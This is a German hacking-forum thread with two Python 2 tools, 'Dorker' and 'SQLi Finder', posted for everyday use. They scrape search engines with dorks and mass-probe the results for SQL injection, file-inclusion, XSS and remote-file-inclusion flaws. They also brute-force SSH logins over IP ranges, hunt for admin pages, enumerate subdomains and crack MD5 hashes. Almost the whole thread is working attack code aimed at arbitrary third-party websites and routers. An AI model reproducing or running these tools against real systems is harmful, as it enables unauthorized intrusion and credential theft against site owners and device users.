Anmelden
Benutzerkonto erstellen
#!/usr/bin/env python
import re
import hashlib
import Queue
from random import choice
import threading
import time
import urllib2
import sys
import socket
try:
import paramiko
PARAMIKO_IMPORTED = True
except ImportError:
PARAMIKO_IMPORTED = False
USER_AGENT = ["Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7",
"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
"YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/535.38.6 (KHTML, like Gecko) Version/5.1 Safari/535.38.6",
"Mozilla/5.0 (Macintosh; U; U; PPC Mac OS X 10_6_7 rv:6.0; en-US) AppleWebKit/532.23.3 (KHTML, like Gecko) Version/4.0.2 Safari/532.23.3"
]
option = ' '
vuln = 0
invuln = 0
np = 0
found = []
class Router(threading.Thread):
"""Checks for routers running ssh with given User/Pass"""
def __init__(self, queue, user, passw):
if not PARAMIKO_IMPORTED:
print 'You need paramiko.'
print 'http://www.lag.net/paramiko/'
sys.exit(1)
threading.Thread.__init__(self)
self.queue = queue
self.user = user
self.passw = passw
def run(self):
"""Tries to connect to given Ip on port 22"""
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
while True:
try:
ip_add = self.queue.get(False)
except Queue.Empty:
break
try:
ssh.connect(ip_add, username = self.user, password = self.passw, timeout = 10)
ssh.close()
print "Working: %s:22 - %s:%s\n" % (ip_add, self.user, self.passw)
write = open('Routers.txt', "a+")
write.write('%s:22 %s:%s\n' % (ip_add, self.user, self.passw))
write.close()
self.queue.task_done()
except:
print 'Not Working: %s:22 - %s:%s\n' % (ip_add, self.user, self.passw)
self.queue.task_done()
class Ip:
"""Handles the Ip range creation"""
def __init__(self):
self.ip_range = []
self.start_ip = raw_input('Start ip: ')
self.end_ip = raw_input('End ip: ')
self.user = raw_input('User: ')
self.passw = raw_input('Password: ')
self.iprange()
def iprange(self):
"""Creates list of Ip's from Start_Ip to End_Ip"""
queue = Queue.Queue()
start = list(map(int, self.start_ip.split(".")))
end = list(map(int, self.end_ip.split(".")))
tmp = start
self.ip_range.append(self.start_ip)
while tmp != end:
start[3] += 1
for i in (3, 2, 1):
if tmp[i] == 256:
tmp[i] = 0
tmp[i-1] += 1
self.ip_range.append(".".join(map(str, tmp)))
for add in self.ip_range:
queue.put(add)
for i in range(10):
thread = Router(queue, self.user, self.passw )
thread.setDaemon(True)
thread.start()
queue.join()
class Crawl:
"""Searches for dorks and grabs results"""
def __init__(self):
if option == '4':
self.shell = str(raw_input('Shell location: '))
self.dork = raw_input('Enter your dork: ')
self.queue = Queue.Queue()
self.pages = raw_input('How many pages(Max 20): ')
self.qdork = urllib2.quote(self.dork)
self.page = 1
self.crawler()
def crawler(self):
"""Crawls Ask.com for sites and sends them to appropriate scan"""
print '\nDorking...'
for i in range(int(self.pages)):
host = "http://uk.ask.com/web?q=%s&page=%s" % (str(self.qdork), self.page)
req = urllib2.Request(host)
req.add_header('User-Agent', choice(USER_AGENT))
response = urllib2.urlopen(req)
source = response.read()
start = 0
count = 1
end = len(source)
numlinks = source.count('_t" href', start, end)
while count < numlinks:
start = source.find('_t" href', start, end)
end = source.find(' onmousedown="return pk', start, end)
link = source[start+10:end-1].replace("amp;","")
self.queue.put(link)
start = end
end = len(source)
count = count + 1
self.page += 1
if option == '1':
for i in range(10):
thread = ScanClass(self.queue)
thread.setDaemon(True)
thread.start()
self.queue.join()
elif option == '2':
for i in range(10):
thread = LScanClass(self.queue)
thread.setDaemon(True)
thread.start()
self.queue.join()
elif option == '3':
for i in range(10):
thread = XScanClass(self.queue)
thread.setDaemon(True)
thread.start()
self.queue.join()
elif option == '4':
for i in range(10):
thread = RScanClass(self.queue, self.shell)
thread.setDaemon(True)
thread.start()
self.queue.join()
class ScanClass(threading.Thread):
"""Scans for Sql errors and ouputs to file"""
def __init__(self, queue):
threading.Thread.__init__(self)
self.queue = queue
self.schar = "'"
self.file = 'sqli.txt'
def run(self):
"""Scans Url for Sql errors"""
while True:
try:
site = self.queue.get(False)
except Queue.Empty:
break
if '=' in site:
global vuln
global invuln
global np
test = site + self.schar
try:
conn = urllib2.Request(test)
conn.add_header('User-Agent', choice(USER_AGENT))
opener = urllib2.build_opener()
data = opener.open(conn).read()
except:
self.queue.task_done()
else:
if (re.findall("error in your SQL syntax", data, re.I)):
self.mysql(test)
vuln += 1
elif (re.findall('oracle.jdbc.', data, re.I)):
self.mssql(test)
vuln += 1
elif (re.findall('system.data.oledb', data, re.I)):
self.mssql(test)
vuln += 1
elif (re.findall('SQL command net properly ended', data, re.I)):
self.mssql(test)
vuln += 1
elif (re.findall('atoracle.jdbc.', data, re.I)):
self.mssql(test)
vuln += 1
elif (re.findall('java.sql.sqlexception', data, re.I)):
self.mssql(test)
vuln += 1
elif (re.findall('query failed:', data, re.I)):
self.mssql(test)
vuln += 1
elif (re.findall('postgresql.util.', data, re.I)):
self.mssql(test)
vuln += 1
elif (re.findall('mysql_fetch', data, re.I)):
self.mysql(test)
vuln += 1
elif (re.findall('Error:unknown', data, re.I)):
self.mysql(test)
vuln += 1
elif (re.findall('JET Database Engine', data, re.I)):
self.mssql(test)
vuln += 1
elif (re.findall('Microsoft OLE DB Provider for', data, re.I)):
self.mssql(test)
vuln += 1
elif (re.findall('mysql_numrows', data, re.I)):
self.mysql(test)
vuln += 1
elif (re.findall('mysql_num', data, re.I)):
self.mysql(test)
vuln += 1
elif (re.findall('Invalid Query', data, re.I)):
self.mysql(test)
vuln += 1
elif (re.findall('FetchRow', data, re.I)):
self.mysql(test)
vuln += 1
elif (re.findall('JET Database', data, re.I)):
self.mssql(test)
vuln += 1
elif (re.findall('OLE DB Provider for', data, re.I)):
self.mssql(test)
vuln += 1
elif (re.findall('Syntax error', data, re.I)):
self.mssql(test)
vuln += 1
else:
print B+test + W+' <-- Not Vuln'
invuln += 1
else:
print R+site + W+' <-- No Parameters'
np += 1
self.queue.task_done()
def mysql(self, url):
"""Proccesses vuln sites into text file and outputs to screen"""
read = open(self.file, "a+").read()
if url in read:
print G+'Dupe: ' + W+url
else:
print O+"MySql: " + url + W
write = open(self.file, "a+")
write.write('[SQLI]: ' + url + "\n")
write.close()
def mssql(self, url):
"""Proccesses vuln sites into text file and outputs to screen"""
read = open(self.file).read()
if url in read:
print G+'Dupe: ' + url + W
else:
print O+"MsSql: " + url + W
write = open (self.file, "a+")
write.write('[SQLI]: ' + url + "\n")
write.close()
class LScanClass(threading.Thread):
"""Scans for Lfi errors and outputs to file"""
def __init__(self, queue):
threading.Thread.__init__(self)
self.file = 'lfi.txt'
self.queue = queue
self.lchar = '../'
def run(self):
"""Checks Url for File Inclusion errors"""
while True:
try:
site = self.queue.get(False)
except Queue.Empty:
break
if '=' in site:
lsite = site.rsplit('=', 1)[0]
if lsite[-1] != "=":
lsite = lsite + "="
test = lsite + self.lchar
global vuln
global invuln
global np
try:
conn = urllib2.Request(test)
conn.add_header('User-Agent', choice(USER_AGENT))
opener = urllib2.build_opener()
data = opener.open(conn).read()
except:
self.queue.task_done()
else:
if (re.findall("failed to open stream: No such file or directory", data, re.I)):
self.lfi(test)
vuln += 1
else:
print B+test + W+' <-- Not Vuln'
invuln += 1
else:
print R+site + W+' <-- No Parameters'
np += 1
self.queue.task_done()
def lfi(self, url):
"""Proccesses vuln sites into text file and outputs to screen"""
read = open(self.file, "a+").read()
if url in read:
print G+'Dupe: ' + url + W
else:
print O+"Lfi: " + url + W
write = open(self.file, "a+")
write.write('[LFI]: ' + url + "\n")
write.close()
class XScanClass(threading.Thread):
"""Scan for Xss errors and outputs to file"""
def __init__(self, queue):
threading.Thread.__init__(self)
self.queue = queue
self.xchar = """<ScRIpT>alert('xssBYCranky');</ScRiPt>"""
self.file = 'xss.txt'
def run(self):
"""Checks Url for possible Xss"""
while True:
try:
site = self.queue.get(False)
except Queue.Empty:
break
if '=' in site:
global vuln
global invuln
global np
xsite = site.rsplit('=', 1)[0]
if xsite[-1] != "=":
xsite = xsite + "="
test = xsite + self.xchar
try:
conn = urllib2.Request(test)
conn.add_header('User-Agent', choice(USER_AGENT))
opener = urllib2.build_opener()
data = opener.open(conn).read()
except:
self.queue.task_done()
else:
if (re.findall("xssBYCranky", data, re.I)):
self.xss(test)
vuln += 1
else:
print B+test + W+' <-- Not Vuln'
invuln += 1
else:
print R+site + W+' <-- No Parameters'
np += 1
self.queue.task_done()
def xss(self, url):
"""Proccesses vuln sites into text file and outputs to screen"""
read = open(self.file, "a+").read()
if url in read:
print G+'Dupe: ' + url + W
else:
print O+"Xss: " + url + W
write = open(self.file, "a+")
write.write('[XSS]: ' + url + "\n")
write.close()
class RScanClass(threading.Thread):
"""Scans for Rfi errors and outputs to file"""
def __init__(self, queue, shell):
threading.Thread.__init__(self)
self.queue = queue
self.file = 'rfi.txt'
self.shell = shell
def run(self):
"""Checks Url for Remote File Inclusion vulnerability"""
while True:
try:
site = self.queue.get(False)
except Queue.Empty:
break
if '=' in site:
global vuln
global invuln
global np
rsite = site.rsplit('=', 1)[0]
if rsite[-1] != "=":
rsite = rsite + "="
link = rsite + self.shell + '?'
try:
conn = urllib2.Request(link)
conn.add_header('User-Agent', choice(USER_AGENT))
opener = urllib2.build_opener()
data = opener.open(conn).read()
except:
self.queue.task_done()
else:
if (re.findall('uname -a', data, re.I)):
self.rfi(link)
vuln += 1
else:
print B+link + W+' <-- Not Vuln'
invuln += 1
else:
print R+site + W+' <-- No Parameters'
np += 1
self.queue.task_done()
def rfi(self, url):
"""Proccesses vuln sites into text file and outputs to screen"""
read = open(self.file, "a+").read()
if url in read:
print G+'Dupe: ' + url + W
else:
print O+"Rfi: " + url + W
write = open(self.file, "a+")
write.write('[Rfi]: ' + url + "\n")
write.close()
class Atest(threading.Thread):
"""Checks given site for Admin Pages/Dirs"""
def __init__(self, queue):
threading.Thread.__init__(self)
self.queue = queue
def run(self):
"""Checks if Admin Page/Dir exists"""
while True:
try:
site = self.queue.get(False)
except Queue.Empty:
break
try:
conn = urllib2.Request(site)
conn.add_header('User-Agent', choice(USER_AGENT))
opener = urllib2.build_opener()
opener.open(conn)
print site
found.append(site)
self.queue.task_done()
except urllib2.URLError:
self.queue.task_done()
def admin():
"""Create queue and threads for admin page scans"""
print 'Need to include http:// and ending /\n'
site = raw_input('Site: ')
queue = Queue.Queue()
dirs = ['admin.php', 'admin/', 'en/admin/', 'administrator/', 'moderator/', 'webadmin/', 'adminarea/', 'bb-admin/', 'adminLogin/', 'admin_area/', 'panel-administracion/', 'instadmin/',
'memberadmin/', 'administratorlogin/', 'adm/', 'admin/account.php', 'admin/index.php', 'admin/login.php', 'admin/admin.php', 'admin/account.php',
'joomla/administrator', 'login.php', 'admin_area/admin.php' ,'admin_area/login.php' ,'siteadmin/login.php' ,'siteadmin/index.php', 'siteadmin/login.html',
'admin/account.html', 'admin/index.html', 'admin/login.html', 'admin/admin.html', 'admin_area/index.php', 'bb-admin/index.php', 'bb-admin/login.php',
'bb-admin/admin.php', 'admin/home.php', 'admin_area/login.html', 'admin_area/index.html', 'admin/controlpanel.php', 'admincp/index.asp', 'admincp/login.asp',
'admincp/index.html', 'admin/account.html', 'adminpanel.html', 'webadmin.html', 'webadmin/index.html', 'webadmin/admin.html', 'webadmin/login.html',
'admin/admin_login.html', 'admin_login.html', 'panel-administracion/login.html', 'admin/cp.php', 'cp.php', 'administrator/index.php', 'cms', 'administrator/login.php',
'nsw/admin/login.php', 'webadmin/login.php', 'admin/admin_login.php', 'admin_login.php', 'administrator/account.php' ,'administrator.php', 'admin_area/admin.html',
'pages/admin/admin-login.php' ,'admin/admin-login.php', 'admin-login.php', 'bb-admin/index.html', 'bb-admin/login.html', 'bb-admin/admin.html', 'admin/home.html',
'modelsearch/login.php', 'moderator.php', 'moderator/login.php', 'moderator/admin.php', 'account.php', 'pages/admin/admin-login.html', 'admin/admin-login.html',
'admin-login.html', 'controlpanel.php', 'admincontrol.php', 'admin/adminLogin.html' ,'adminLogin.html', 'admin/adminLogin.html', 'home.html',
'rcjakar/admin/login.php', 'adminarea/index.html', 'adminarea/admin.html', 'webadmin.php', 'webadmin/index.php', 'webadmin/admin.php', 'admin/controlpanel.html',
'admin.html', 'admin/cp.html', 'cp.html', 'adminpanel.php', 'moderator.html', 'administrator/index.html', 'administrator/login.html', 'user.html',
'administrator/account.html', 'administrator.html', 'login.html', 'modelsearch/login.html', 'moderator/login.html', 'adminarea/login.html',
'panel-administracion/index.html', 'panel-administracion/admin.html', 'modelsearch/index.html', 'modelsearch/admin.html', 'admincontrol/login.html',
'adm/index.html', 'adm.html', 'moderator/admin.html', 'user.php', 'account.html', 'controlpanel.html', 'admincontrol.html', 'panel-administracion/login.php',
'wp-login.php', 'wp-admin', 'typo3', 'adminLogin.php', 'admin/adminLogin.php', 'home.php','adminarea/index.php' ,'adminarea/admin.php' ,'adminarea/login.php',
'panel-administracion/index.php', 'panel-administracion/admin.php', 'modelsearch/index.php', 'modelsearch/admin.php', 'admincontrol/login.php',
'adm/admloginuser.php', 'admloginuser.php', 'admin2.php', 'admin2/login.php', 'admin2/index.php', 'adm/index.php', 'adm.php', 'affiliate.php','admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']
for add in dirs:
test = site + add
queue.put(test)
for i in range(20):
thread = Atest(queue)
thread.setDaemon(True)
thread.start()
queue.join()
def aprint():
"""Print results of admin page scans"""
print 'Search Finished\n'
if len(found) == 0:
print 'No pages found'
else:
for site in found:
print O+'Found: ' + G+site + W
class SDtest(threading.Thread):
"""Checks given Domain for Sub Domains"""
def __init__(self, queue):
threading.Thread.__init__(self)
self.queue = queue
def run(self):
"""Checks if Sub Domain responds"""
while True:
try:
domain = self.queue.get(False)
except Queue.Empty:
break
try:
site = 'http://' + domain
conn = urllib2.Request(site)
conn.add_header('User-Agent', choice(USER_AGENT))
opener = urllib2.build_opener()
opener.open(conn)
except urllib2.URLError:
self.queue.task_done()
else:
target = socket.gethostbyname(domain)
print 'Found: ' + site + ' - ' + target
self.queue.task_done()
def subd():
"""Create queue and threads for sub domain scans"""
queue = Queue.Queue()
site = raw_input('Domain: ')
sub = ["admin", "access", "accounting", "accounts", "admin", "administrator", "aix", "ap", "archivos", "aula", "aulas", "ayuda", "backup", "backups", "bart", "bd", "beta", "biblioteca",
"billing", "blackboard", "blog", "blogs", "bsd", "cart", "catalog", "catalogo", "catalogue", "chat", "chimera", "citrix", "classroom", "clientes", "clients", "carro",
"connect", "controller", "correoweb", "cpanel", "csg", "customers", "db", "dbs", "demo", "demon", "demostration", "descargas", "developers", "development", "diana",
"directory", "dmz", "domain", "domaincontroller", "download", "downloads", "ds", "eaccess", "ejemplo", "ejemplos", "email", "enrutador", "example", "examples", "exchange",
"eventos", "events", "extranet", "files", "finance", "firewall", "foro", "foros", "forum", "forums", "ftp", "ftpd", "fw", "galeria", "gallery", "gateway", "gilford",
"groups", "groupwise", "guia", "guide", "gw", "help", "helpdesk", "hera", "heracles", "hercules", "home", "homer", "hotspot", "hypernova", "images", "imap", "imap3", "imap3d",
"imapd", "imaps", "imgs", "imogen", "inmuebles", "internal", "intranet", "ipsec", "irc", "ircd", "jabber", "laboratorio", "lab", "laboratories", "labs", "library", "linux", "lisa", "login", "logs", "mail", "mailgate", "manager", "marketing", "members", "mercury", "meta", "meta01", "meta02", "meta03", "miembros", "minerva", "mob", "mobile", "moodle", "movil",
"mssql", "mx", "mx0", "mx1", "mx2", "mx3", "mysql", "nelson", "neon", "netmail", "news", "novell", "ns", "ns0", "ns1", "ns2", "ns3", "online", "oracle", "owa", "partners", "pcanywhere",
"pegasus", "pendrell", "personal", "photo", "photos", "pop", "pop3", "portal", "postman", "postmaster", "private", "proxy", "prueba", "pruebas", "public", "ras", "remote", "reports", "research",
"restricted", "robinhood", "router", "rtr", "sales", "sample", "samples", "sandbox", "search", "secure", "seguro", "server", "services", "servicios", "servidor", "shop", "shopping",
"smtp", "socios", "soporte", "squirrel", "squirrelmail", "ssh", "staff", "sms", "solaris", "sql", "stats", "sun", "support", "test", "tftp", "tienda", "unix", "upload", "uploads",
"ventas", "virtual", "vista", "vnc", "vpn", "vpn1", "vpn2", "vpn3", "wap", "web1", "web2", "web3", "webct", "webadmin", "webmail", "webmaster", "win", "windows", "www", "ww0", "ww1",
"ww2", "ww3", "www0", "www1", "www2", "www3", "xanthus", "zeus"]
for check in sub:
test = check + '.' + site
queue.put(test)
for i in range(20):
thread = SDtest(queue)
thread.setDaemon(True)
thread.start()
queue.join()
class Cracker(threading.Thread):
"""Use a wordlist to try and brute the hash"""
def __init__(self, queue, hashm):
threading.Thread.__init__(self)
self.queue = queue
self.hashm = hashm
def run(self):
"""Hash word and check against hash"""
while True:
try:
word = self.queue.get(False)
except Queue.Empty:
break
tmp = hashlib.md5(word).hexdigest()
if tmp == self.hashm:
self.result(word)
self.queue.task_done()
def result(self, words):
"""Print result if found"""
print self.hashm + ' = ' + words
def word():
"""Create queue and threads for hash crack"""
queue = Queue.Queue()
wordlist = raw_input('Wordlist: ')
hashm = raw_input('Enter Md5 hash: ')
read = open(wordlist)
for words in read:
words = words.replace("\n","")
queue.put(words)
read.close()
for i in range(5):
thread = Cracker(queue, hashm)
thread.setDaemon(True)
thread.start()
queue.join()
class OnlineCrack:
"""Use online service to check for hash"""
def crack(self):
"""Connect and check hash"""
hashm = raw_input('Enter MD5 Hash: ')
conn = urllib2.Request('http://md5.hashcracking.com/search.php?md5=%s' % (hashm))
conn.add_header('User-Agent', choice(USER_AGENT))
opener = urllib2.build_opener()
opener.open(conn)
data = opener.open(conn).read()
if data == 'No results returned.':
print '\n- Not found or not valid -'
else:
print '\n- %s -' % (data)
class Check:
"""Check your current IP address"""
def grab(self):
"""Connect to site and grab IP"""
site = 'http://www.tracemyip.org/'
try:
conn = urllib2.Request(site)
conn.add_header('User-Agent', choice(USER_AGENT))
opener = urllib2.build_opener()
opener.open(conn)
data = opener.open(conn).read()
start = 0
end = len(data)
start = data.find('onclick="', start, end)
end = data.find('size=', start, end)
ip_add = data[start+46:end-2].strip()
print '\nYour current Ip address is %s' % (ip_add)
except urllib2.HTTPError:
print 'Error connecting'
def output():
"""Outputs dork scan results to screen"""
print '\n>> ' + str(vuln) + G+' Vulnerable Sites Found' + W
print '>> ' + str(invuln) + G+' Sites Not Vulnerable' + W
print '>> ' + str(np) + R+' Sites Without Parameters' + W
if option == '1':
print '>> Output Saved To sqli.txt\n'
elif option == '2':
print '>> Output Saved To lfi.txt'
elif option == '3':
print '>> Output Saved To xss.txt'
elif option == '4':
print '>> Output Saved To rfi.txt'
W = "\033[0m";
R = "\033[31m";
G = "\033[32m";
O = "\033[33m";
B = "\033[34m";
def main():
"""Outputs Menu and gets input"""
quotes = [
'\nprohexuh@gmail.com\n'
]
print (O+'''
-------------
-- Dorker --
--- v1.5 ----
---- by -----
--- Cranky ----
-------------''')
print (G+'''
-[1]- SQLi
-[2]- LFI
-[3]- XSS
-[4]- RFI
-[5]- Proxy
-[6]- Admin Page Finder
-[7]- Sub Domain Scan
-[8]- Dictionary MD5 cracker
-[9]- Online MD5 cracker
-[10]- Check your IP address''')
print (B+'''
-[!]- If freeze while running or want to quit,
just Ctrl C, it will automatically terminate the job.
''')
print W
global option
option = raw_input('Enter Option: ')
if option:
if option == '1':
Crawl()
output()
print choice(quotes)
elif option == '2':
Crawl()
output()
print choice(quotes)
elif option == '3':
Crawl()
output()
print choice(quotes)
elif option == '4':
Crawl()
output()
print choice(quotes)
elif option == '5':
Ip()
print choice(quotes)
elif option == '6':
admin()
aprint()
print choice(quotes)
elif option == '7':
subd()
print choice(quotes)
elif option == '8':
word()
print choice(quotes)
elif option == '9':
OnlineCrack().crack()
print choice(quotes)
elif option == '10':
Check().grab()
print choice(quotes)
else:
print R+'\nInvalid Choice\n' + W
time.sleep(0.9)
main()
else:
print R+'\nYou Must Enter An Option (Check if your typo is corrected.)\n' + W
time.sleep(0.9)
main()
if __name__ == '__main__':
main()
Als Gast hast du nur eingeschränkten Zugriff!
Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.
- Antworte auf Themen oder erstelle deine eigenen.
- Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
- Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
- Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
[Python] Dorker.py
Erstellt von
Cranky
#1
Geschrieben 16 December 2013 - 00:06 Uhr
Cranky
-
-
Banned -
- 197 Beiträge
- 18 Bedankt
Hacker
Likes
68
-
655869548
-
Android -
Linux
Da ich noch wenige posts habe werde ich einfach paar tools posten die ich im alltag nutze. Ich beginn mal beim Dorker script:
Ich "hacke" keine whatsapp oder facebook accounts aber schreibt mich ruhig an was das betrifft dann hab ich was zu lachen. 
Nach oben
Melden
#2
Geschrieben 16 December 2013 - 00:12 Uhr
Cranky
-
-
Banned -
- 197 Beiträge
- 18 Bedankt
Hacker
Likes
68
-
-
Android
-
Linux
import urllib2
import os
import re
import httplib
from time import sleep
if os.name == 'nt':
os.system('cls') # Windows
else:
os.system('clear') # Linux
def welcome():
print'''
|=======================================================|
|================= [ ProHex ] =======================|
|============ [ prohexuh@gmail.com ] =============|
|===[ http://www.ioscoderz.com - iOSCoderz - Coding ]===|
|=======================================================|
| SQLi Finder by ProHex |
|=======================================================|
'''
print "[1] From Google n"
print "[2] From Bing n"
print "[3] From Ip n"
file=open('lol.txt','w')
file1=open('lol.txt','r')
def getsitesgoogle():
dork=raw_input("dork : ")
start=0
end=490
sleep(3)
print "Getting Websites From google ... "
while start<=end :
con = urllib2.urlopen('http://startgoogle.startpagina.nl/index.php?start='+str(start)+'&q='+dork)
readd=con.read()
find=re.findall('<a href="(.*)" target="_self" onclick="',readd)
start = start+10
for i in range(len(find)):
rez=find[i]+"'"
file.write(rez + 'n')
os.system('exit')
def getsitesbing():
dork=raw_input("dork : ")
start=0
end=200
sleep(3)
print "Getting Websites From Bing ... "
while start<=end :
con = urllib2.urlopen('http://www.bing.com/search?q='+dork+"&first="+str(start))
readd=con.read()
find=re.findall('<div class="sb_tlst"><h3><a href="(.*?)" h=',readd)
start = start+10
for i in range(len(find)):
rez=find[i]+"'"
file.write(rez + 'n')
os.system('exit')
def findsql():
file2=open("rez.txt",'a')
domains=file1.read().split()
print "Scaning Websites From sql Injection ... "
for domaine in domains :
try:
conn = urllib2.urlopen(domaine)
readd=conn.read()
findd=re.findall('/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i|You have an error in your SQL syntax|Microsoft VBScript runtime error',readd)
if(findd):
print "Sql FOund=>"+domaine+("n")
file2.write(domaine+("n"))
else:
print "Not FOund =>"+domaine+("n")
except IOError:
print "Error"
def getsitesip():
ip=raw_input("Server ip : " )
dork=raw_input("Dork [ex : id= . php?id=] : " )
start=0
end=50000
print "Getting "+ip+" Websites From Bing ... "
while start<=end :
con = urllib2.urlopen('http://www.bing.com/search?q=ip%3A'+ip+'+'+dork+'&first='+str(start))
readd=con.read()
find=re.findall('<div class="sb_tlst"><h3><a href="(.*?)" h="ID',readd)
start = start+10
for i in range(len(find)):
rez=find[i]+"'"
file.write(rez + 'n')
os.system('exit')
welcome()
ask1=raw_input("Chose Number : ")
if (ask1=='1'):
getsitesgoogle()
if (ask1=='2') :
getsitesbing()
if (ask1=='3') :
getsitesip()
findsql()
- darookie gefällt das
Ich "hacke" keine whatsapp oder facebook accounts aber schreibt mich ruhig an was das betrifft dann hab ich was zu lachen.
Web Coding
| Thema | Forum | Themenstarter | Statistik | Letzter Beitrag | |
|---|---|---|---|---|---|
Python Webscraping |
 Hilfe / Fragen / Unterstützung
|
AxelSpringer |
|
|
|
Python bringt Fehlermeldung |
Sonstige | Avni |
|
|
|
Python Script ausführen |
Hilfe / Fragen / Unterstützung
|
Avni |
|
|
Dieses Thema wurde von 57 Mitglied(ern) gelesen
Coding
Made with in germany.
